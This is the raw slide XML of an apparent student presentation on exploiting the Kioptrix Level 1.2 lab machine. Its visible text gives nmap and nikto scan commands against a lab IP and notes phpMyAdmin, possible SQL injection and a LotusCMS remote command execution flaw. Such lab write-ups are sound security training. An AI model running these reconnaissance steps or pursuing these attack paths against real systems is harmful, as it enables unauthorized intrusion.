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7" r:id="rId15"/>
    <p:sldId id="269" r:id="rId16"/>
    <p:sldId id="287" r:id="rId17"/>
    <p:sldId id="308" r:id="rId18"/>
    <p:sldId id="270" r:id="rId19"/>
    <p:sldId id="292" r:id="rId20"/>
    <p:sldId id="293" r:id="rId21"/>
    <p:sldId id="294" r:id="rId22"/>
    <p:sldId id="295" r:id="rId23"/>
    <p:sldId id="286" r:id="rId24"/>
    <p:sldId id="289" r:id="rId25"/>
    <p:sldId id="290" r:id="rId26"/>
    <p:sldId id="288" r:id="rId27"/>
    <p:sldId id="291" r:id="rId28"/>
    <p:sldId id="300" r:id="rId29"/>
    <p:sldId id="301" r:id="rId30"/>
    <p:sldId id="302" r:id="rId31"/>
    <p:sldId id="271" r:id="rId32"/>
    <p:sldId id="272" r:id="rId33"/>
    <p:sldId id="273" r:id="rId34"/>
    <p:sldId id="303" r:id="rId35"/>
    <p:sldId id="274" r:id="rId36"/>
    <p:sldId id="275" r:id="rId37"/>
    <p:sldId id="297" r:id="rId38"/>
    <p:sldId id="298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305" r:id="rId50"/>
    <p:sldId id="309" r:id="rId51"/>
    <p:sldId id="310" r:id="rId52"/>
    <p:sldId id="311" r:id="rId53"/>
    <p:sldId id="312" r:id="rId54"/>
    <p:sldId id="313" r:id="rId55"/>
    <p:sldId id="314" r:id="rId56"/>
    <p:sldId id="306" r:id="rId57"/>
  </p:sldIdLst>
  <p:sldSz cx="18288000" cy="10287000"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Arimo" panose="020B0604020202020204" charset="0"/>
      <p:regular r:id="rId59"/>
      <p:bold r:id="rId60"/>
      <p:italic r:id="rId61"/>
      <p:boldItalic r:id="rId62"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Bebas Neue" panose="020B0606020202050201" pitchFamily="34" charset="0"/>
      <p:regular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iKxjC7sEUnHnrHV/kr9h/fUl59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70" d="100"/>
          <a:sy n="70" d="100"/>
        </p:scale>
        <p:origin x="80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5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kioptrix3.com/phpmyadmin/index.php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85" name="Google Shape;85;p1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1028700" y="2489909"/>
            <a:ext cx="10611580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Exploiting </a:t>
            </a:r>
            <a:endParaRPr sz="12000" b="0" i="0" u="none" strike="noStrike" cap="non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028700" y="4048125"/>
            <a:ext cx="1061158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Kioptrix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: Level 1.2 #3</a:t>
            </a:r>
            <a:endParaRPr sz="9000" b="0" i="0" u="none" strike="noStrike" cap="none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89" name="Google Shape;189;p10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7233899" y="2319187"/>
            <a:ext cx="10025401" cy="6453852"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="10025401" h="6453852" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10025401" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10025401" y="6453851"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6453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90" name="Google Shape;190;p10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1028700" y="764975"/>
            <a:ext cx="7354402" cy="24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OS and service scan </a:t>
            </a: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1187662" y="2578535"/>
            <a:ext cx="8807693" cy="11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nmap  -A  - p22,80 10.0.2.8 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97" name="Google Shape;197;p11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4812736" y="3487770"/>
            <a:ext cx="8662528" cy="36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65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Vulnerability Assessment</a:t>
            </a:r>
            <a:endParaRPr sz="11965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98" name="Google Shape;198;p11"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off x="-1062675" y="5138737"/>
            <a:ext cx="10463359" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="2022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11"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off x="8795355" y="5138737"/>
            <a:ext cx="10463359" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="20222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05" name="Google Shape;205;p12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8246774" y="236207"/>
            <a:ext cx="7632638" cy="6087029"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7632638" h="6087029" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7632638" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7632638" y="6087029"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6087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06" name="Google Shape;206;p12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8240815" y="6525179"/>
            <a:ext cx="7638598" cy="3284597"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7638598" h="3284597" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7638597" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7638597" y="3284597"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3284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07" name="Google Shape;207;p12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1028700" y="764975"/>
            <a:ext cx="7354402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Vuln scan</a:t>
            </a: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1028700" y="2335793"/>
            <a:ext cx="8807693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. nmap --script vuln - p22,80 10.0.2.8 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1028700" y="5614042"/>
            <a:ext cx="4126111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There’re pages </a:t>
            </a:r>
            <a:endParaRPr sz="32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on HTTP service on port 80 and </a:t>
            </a:r>
            <a:endParaRPr sz="32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possibility of SQL injection</a:t>
            </a:r>
            <a:endParaRPr sz="32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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="23812" y="2949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15" name="Google Shape;215;p13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1465006" y="3349575"/>
            <a:ext cx="14719356" cy="6237327"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="14719356" h="6237327" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="14719356" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14719356" y="6237327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="623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1028700" y="764975"/>
            <a:ext cx="7354402" cy="24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Nikto scan</a:t>
            </a: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1028700" y="2335793"/>
            <a:ext cx="880769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     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200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nikto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="32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-h http://10.0.2.8 </a:t>
            </a:r>
            <a:endParaRPr sz="3200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8" name="Google Shape;218;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5992120" y="2335793"/>
            <a:ext cx="900699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There’s “/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200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phpmyadmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="32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” and some other possible vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr sz="3200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5810-EA61-ECD2-5FFE-DFCAD1B14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55B2D-F64E-2B20-958E-60BB4F50C6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82B6C-FFD4-8C6D-85A7-0E669C34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8282583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D8295-E571-BD3F-3921-C9EB41032A5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4395019" y="3886200"/>
            <a:ext cx="10102645" cy="1933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9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Bebas Neue"/>
                <a:cs typeface="Bebas Neue"/>
                <a:sym typeface="Bebas Neue"/>
              </a:rPr>
              <a:t>Access the results</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="150404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24" name="Google Shape;224;p14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="429270" y="902729"/>
            <a:ext cx="6218584" cy="3863295"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6218584" h="3863295" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6218584" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6218584" y="3863296"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3863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25" name="Google Shape;225;p14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8203859" y="1157698"/>
            <a:ext cx="9400700" cy="3490010"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="9400700" h="3490010" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9400700" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9400700" y="3490010"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3490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26" name="Google Shape;226;p14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1009310" y="5401950"/>
            <a:ext cx="5058504" cy="4435029"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3486883" h="3338690" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3486883" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3486883" y="3338690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3338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27" name="Google Shape;227;p14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2193842" y="311227"/>
            <a:ext cx="10611580" cy="11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Access the site </a:t>
            </a:r>
            <a:endParaRPr sz="3200" b="0" i="0" u="none" strike="noStrike" cap="none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11504027" y="287384"/>
            <a:ext cx="2357914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View page source </a:t>
            </a:r>
            <a:endParaRPr sz="32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6860298" y="4852035"/>
            <a:ext cx="2687122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Explore everything </a:t>
            </a:r>
            <a:endParaRPr sz="32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989B8F-5BC3-4F36-B0AC-2A6CDE51A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726" y="5263157"/>
            <a:ext cx="5809992" cy="4712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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4233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84" name="Google Shape;384;p32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="3252092"/>
            <a:ext cx="6553200" cy="5140129"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7559878" h="4658775" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7559877" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7559877" y="4658774"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4658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2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1708004" y="3637597"/>
            <a:ext cx="953452" cy="759142"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1271270" h="1012190" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="1226820" y="190500"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="1188720" y="157480"/>
                  <a:pt x="1178560" y="156210"/>
                  <a:pt x="1160780" y="153670"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1118870" y="147320"/>
                  <a:pt x="991870" y="158750"/>
                  <a:pt x="951230" y="149860"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="932180" y="146050"/>
                  <a:pt x="930910" y="137160"/>
                  <a:pt x="913130" y="133350"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="883920" y="125730"/>
                  <a:pt x="822960" y="134620"/>
                  <a:pt x="779780" y="125730"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="737870" y="116840"/>
                  <a:pt x="712470" y="90170"/>
                  <a:pt x="656590" y="80010"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="553720" y="62230"/>
                  <a:pt x="288290" y="62230"/>
                  <a:pt x="199390" y="77470"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="160020" y="83820"/>
                  <a:pt x="139700" y="90170"/>
                  <a:pt x="118110" y="106680"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="95250" y="124460"/>
                  <a:pt x="76200" y="149860"/>
                  <a:pt x="64770" y="184150"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="48260" y="232410"/>
                  <a:pt x="41910" y="334010"/>
                  <a:pt x="57150" y="382270"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="68580" y="416560"/>
                  <a:pt x="100330" y="430530"/>
                  <a:pt x="118110" y="459740"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="138430" y="494030"/>
                  <a:pt x="148590" y="541020"/>
                  <a:pt x="170180" y="579120"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="194310" y="621030"/>
                  <a:pt x="233680" y="660400"/>
                  <a:pt x="256540" y="698500"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="276860" y="730250"/>
                  <a:pt x="281940" y="762000"/>
                  <a:pt x="303530" y="791210"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="327660" y="824230"/>
                  <a:pt x="358140" y="859790"/>
                  <a:pt x="396240" y="883920"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="435610" y="910590"/>
                  <a:pt x="474980" y="927100"/>
                  <a:pt x="535940" y="938530"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="641350" y="960120"/>
                  <a:pt x="929640" y="976630"/>
                  <a:pt x="980440" y="947420"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="995680" y="938530"/>
                  <a:pt x="988060" y="923290"/>
                  <a:pt x="998220" y="911860"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1013460" y="896620"/>
                  <a:pt x="1047750" y="886460"/>
                  <a:pt x="1062990" y="869950"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1075690" y="858520"/>
                  <a:pt x="1080770" y="849630"/>
                  <a:pt x="1089660" y="829310"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1107440" y="783590"/>
                  <a:pt x="1108710" y="619760"/>
                  <a:pt x="1131570" y="588010"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1140460" y="576580"/>
                  <a:pt x="1153160" y="585470"/>
                  <a:pt x="1160780" y="574040"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1182370" y="544830"/>
                  <a:pt x="1189990" y="411480"/>
                  <a:pt x="1193800" y="360680"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1196340" y="331470"/>
                  <a:pt x="1198880" y="313690"/>
                  <a:pt x="1195070" y="292100"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1191260" y="271780"/>
                  <a:pt x="1169670" y="247650"/>
                  <a:pt x="1172210" y="234950"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1174750" y="227330"/>
                  <a:pt x="1184910" y="222250"/>
                  <a:pt x="1191260" y="220980"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1198880" y="219710"/>
                  <a:pt x="1209040" y="222250"/>
                  <a:pt x="1214120" y="227330"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1219200" y="232410"/>
                  <a:pt x="1221740" y="243840"/>
                  <a:pt x="1220470" y="250190"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1219200" y="257810"/>
                  <a:pt x="1212850" y="266700"/>
                  <a:pt x="1205230" y="269240"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1198880" y="271780"/>
                  <a:pt x="1187450" y="270510"/>
                  <a:pt x="1182370" y="266700"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1176020" y="262890"/>
                  <a:pt x="1170940" y="252730"/>
                  <a:pt x="1170940" y="246380"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1170940" y="238760"/>
                  <a:pt x="1174750" y="228600"/>
                  <a:pt x="1181100" y="224790"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1188720" y="220980"/>
                  <a:pt x="1202690" y="219710"/>
                  <a:pt x="1211580" y="226060"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1226820" y="234950"/>
                  <a:pt x="1239520" y="265430"/>
                  <a:pt x="1245870" y="292100"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1253490" y="326390"/>
                  <a:pt x="1245870" y="374650"/>
                  <a:pt x="1240790" y="417830"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1234440" y="466090"/>
                  <a:pt x="1226820" y="530860"/>
                  <a:pt x="1211580" y="568960"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1200150" y="595630"/>
                  <a:pt x="1183640" y="601980"/>
                  <a:pt x="1172210" y="629920"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1151890" y="680720"/>
                  <a:pt x="1149350" y="811530"/>
                  <a:pt x="1130300" y="858520"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1118870" y="883920"/>
                  <a:pt x="1109980" y="896620"/>
                  <a:pt x="1094740" y="909320"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1079500" y="923290"/>
                  <a:pt x="1050290" y="924560"/>
                  <a:pt x="1037590" y="937260"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1028700" y="948690"/>
                  <a:pt x="1031240" y="966470"/>
                  <a:pt x="1022350" y="976630"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1013460" y="986790"/>
                  <a:pt x="1003300" y="991870"/>
                  <a:pt x="982980" y="996950"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="920750" y="1012190"/>
                  <a:pt x="690880" y="1008380"/>
                  <a:pt x="590550" y="995680"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="524510" y="988060"/>
                  <a:pt x="471170" y="972820"/>
                  <a:pt x="429260" y="956310"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="400050" y="944880"/>
                  <a:pt x="383540" y="937260"/>
                  <a:pt x="358140" y="918210"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="322580" y="890270"/>
                  <a:pt x="269240" y="835660"/>
                  <a:pt x="241300" y="793750"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="218440" y="760730"/>
                  <a:pt x="212090" y="713740"/>
                  <a:pt x="194310" y="694690"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="182880" y="683260"/>
                  <a:pt x="167640" y="685800"/>
                  <a:pt x="160020" y="674370"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="149860" y="661670"/>
                  <a:pt x="157480" y="640080"/>
                  <a:pt x="149860" y="618490"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="135890" y="580390"/>
                  <a:pt x="97790" y="501650"/>
                  <a:pt x="73660" y="478790"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="62230" y="467360"/>
                  <a:pt x="49530" y="472440"/>
                  <a:pt x="40640" y="462280"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="26670" y="447040"/>
                  <a:pt x="15240" y="420370"/>
                  <a:pt x="8890" y="391160"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="342900"/>
                  <a:pt x="5080" y="245110"/>
                  <a:pt x="11430" y="196850"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16510" y="168910"/>
                  <a:pt x="21590" y="149860"/>
                  <a:pt x="30480" y="130810"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="39370" y="114300"/>
                  <a:pt x="45720" y="102870"/>
                  <a:pt x="60960" y="88900"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="85090" y="67310"/>
                  <a:pt x="119380" y="40640"/>
                  <a:pt x="172720" y="26670"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="276860" y="0"/>
                  <a:pt x="558800" y="10160"/>
                  <a:pt x="665480" y="30480"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="718820" y="40640"/>
                  <a:pt x="742950" y="67310"/>
                  <a:pt x="783590" y="74930"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="822960" y="83820"/>
                  <a:pt x="875030" y="73660"/>
                  <a:pt x="905510" y="80010"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="925830" y="83820"/>
                  <a:pt x="930910" y="93980"/>
                  <a:pt x="953770" y="99060"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1003300" y="110490"/>
                  <a:pt x="1146810" y="88900"/>
                  <a:pt x="1201420" y="110490"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1233170" y="121920"/>
                  <a:pt x="1264920" y="148590"/>
                  <a:pt x="1268730" y="165100"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1271270" y="176530"/>
                  <a:pt x="1262380" y="191770"/>
                  <a:pt x="1254760" y="195580"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1248410" y="199390"/>
                  <a:pt x="1226820" y="190500"/>
                  <a:pt x="1226820" y="190500"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="057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11260455" y="3252092"/>
            <a:ext cx="5319541" cy="5303020"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5319541" h="5303020" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5319540" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5319540" y="5303020"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5303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87" name="Google Shape;387;p32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="599367" y="1932879"/>
            <a:ext cx="3563704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OEPN THE LOGIN PAGE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8" name="Google Shape;388;p32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9143999" y="1932879"/>
            <a:ext cx="9256853" cy="16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75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login page, it indicated that this site was based on LotusCMS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3175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endParaRPr sz="3175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3984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75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6934200" y="394456"/>
            <a:ext cx="3792267" cy="114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35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Exploitation</a:t>
            </a:r>
            <a:endParaRPr sz="6235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5C470-96B1-E5B0-B84D-75BE770965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209E5-F3A0-489C-B30E-E99887A17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6BDC4-821D-26D7-4FA3-0F9AE700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" y="0"/>
            <a:ext cx="18282583" cy="1028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B480BA-7376-5EF0-B5E1-6A28116759B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480163" y="2947066"/>
            <a:ext cx="606532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By searching about </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3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lotuscms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3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 we found that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32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It’s vulnerable for remote command execution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32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32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32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CB54816-01A2-BA91-F175-1F99AAF49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08" y="1453654"/>
            <a:ext cx="11241069" cy="68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2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35" name="Google Shape;235;p15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1028700" y="4511040"/>
            <a:ext cx="16230600" cy="136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Exploitation</a:t>
            </a:r>
            <a:endParaRPr sz="96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38" name="Google Shape;438;p37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1028700" y="4491990"/>
            <a:ext cx="16230600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First WAY using burp suite</a:t>
            </a:r>
            <a:endParaRPr sz="9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0" y="-358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92" name="Google Shape;92;p2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13529441" y="5406672"/>
            <a:ext cx="5309822" cy="5648746"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5309822" h="5648746" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5309822" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5309822" y="5648746"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5648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93" name="Google Shape;93;p2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1028700" y="2157282"/>
            <a:ext cx="10611580" cy="155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team members</a:t>
            </a:r>
            <a:endParaRPr sz="90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9183742" y="1648380"/>
            <a:ext cx="7000610" cy="1345357"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5420212" h="1041641" extrusionOk="0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1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9651087" y="2020069"/>
            <a:ext cx="5976140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Abdelrahman Khaled</a:t>
            </a:r>
            <a:endParaRPr sz="36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9183742" y="3394149"/>
            <a:ext cx="7000610" cy="1345357"/>
          </a:xfrm>
          <a:custGeom>
